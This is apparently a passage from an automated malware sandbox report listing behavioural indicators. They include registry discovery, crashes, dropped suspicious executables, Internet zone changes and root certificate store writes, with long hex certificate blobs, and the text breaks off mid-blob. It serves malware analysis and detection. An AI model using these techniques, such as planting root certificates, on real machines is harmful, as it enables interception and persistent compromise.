| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Help\Winlogon.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Help\Winlogon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\HD____11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5 | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 040000000100000010000000cb17e431673ee209fe455793f30afa1c0f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c953000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df1400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331330b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3617e000000010000000800000000c0032f2df8d6016800000001000000000000000300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e5190000000100000010000000d8b5fb368468620275d142ffd2aade372000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 5c000000010000000400000000080000190000000100000010000000d8b5fb368468620275d142ffd2aade370300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e56800000001000000000000007e000000010000000800000000c0032f2df8d6011d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3610b000000010000001200000056006500720069005300690067006e0000001400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331336200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df09000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703017f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c9040000000100000010000000cb17e431673ee209fe455793f30afa1c2000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a | C:\Users\Admin\Downloads\HitmanPro_x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b